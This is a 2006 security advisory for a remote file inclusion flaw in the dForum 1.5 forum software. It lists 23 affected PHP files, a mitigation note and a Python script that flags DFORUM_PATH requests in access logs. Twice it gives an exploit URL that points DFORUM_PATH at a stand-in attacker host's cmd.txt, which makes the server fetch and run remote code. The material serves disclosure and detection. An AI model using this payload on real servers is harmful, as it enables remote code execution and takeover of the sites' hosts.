Vendor: dForum
By: nukedx
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 94
Product Name: dForum
Affected Version From: dForum <= 1.5
Affected Version To: dForum <= 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:dforum:dforum
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities

dForum <= 1.5 is vulnerable to remote file inclusion through the DFORUM_PATH parameter. The affected files include about.php, admin.php, anmelden.php, closethread.php, config.php, delpost.php, delthread.php, dfcode.php, download.php, editanoc.php, forum.php, login.php, makethread.php, menu.php, newthread.php, openthread.php, overview.php, post.php, suchen.php, user.php, userconfig.php, userinfo.php and verwalten.php. The exploit requests one of these files with a URL of the form http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?

Mitigation:

Validate and sanitize user input so that the application is not vulnerable to Remote File Inclusion: a request parameter such as DFORUM_PATH must not decide which file gets included.
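For triage on an installation that has been exposed, the following added example (not part of the original advisory or of dForum) scans web-server access-log lines for requests that set DFORUM_PATH and classifies each hit. The log lines, addresses and the example.invalid host are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script names the advisory lists as accepting DFORUM_PATH.
AFFECTED = set("""about admin anmelden closethread config delpost delthread dfcode
download editanoc forum login makethread menu newthread openthread overview post
suchen user userconfig userinfo verwalten""".split())

# Request field of a common/combined access-log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Value starting with a URL scheme (http:, ftp:, php:, data:, ...) or "//host"
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)

def classify(line):
    """Return (verdict, script) for one log line, or None if DFORUM_PATH is absent.

    verdict is 'remote-include' when the value names a URL, else 'path-override'.
    Assumption: legitimate clients never send DFORUM_PATH, so any use is reported.
    """
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    script = target.path.rsplit("/", 1)[-1]
    values = parse_qs(target.query, keep_blank_values=True).get("DFORUM_PATH")
    if values is None:
        return None
    # parse_qs decodes once; decode again so double-encoded values are still seen.
    remote = any(REMOTE_RE.match(unquote(v)) for v in values)
    return ("remote-include" if remote else "path-override", script)

def is_listed(script):
    """True when the script is one of the files named in the advisory."""
    name, _, ext = script.lower().rpartition(".")
    return ext == "php" and name in AFFECTED

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [21/Apr/2006:10:00:01 +0000] "GET /forum/forum.php?id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Apr/2006:10:02:11 +0000] "GET /forum/about.php?DFORUM_PATH=http://example.invalid/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [21/Apr/2006:10:02:15 +0000] "GET /forum/suchen.php?DFORUM_PATH=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 312',
    '203.0.113.4 - - [21/Apr/2006:10:05:40 +0000] "GET /forum/post.php?DFORUM_PATH=./ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE:
        hit = classify(line)
        if hit:
            print(hit[0], hit[1], "listed" if is_listed(hit[1]) else "unlisted", sep="\t")
```

Access logs record only the request line, so this covers the query-string form shown in the advisory.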

Exploit-DB raw data:

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on dForum <= 1.5
http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Files ->
about.php
admin.php
anmelden.php
closethread.php
config.php
delpost.php
delthread.php
dfcode.php
download.php
editanoc.php
forum.php
login.php
makethread.php
menu.php
newthread.php
openthread.php
overview.php
post.php
suchen.php
user.php
userconfig.php
userinfo.php
verwalten.php
Original advisory: http://www.nukedx.com/?viewdoc=27
# nukedx.com [2006-04-21]

# milw0rm.com [2006-04-21]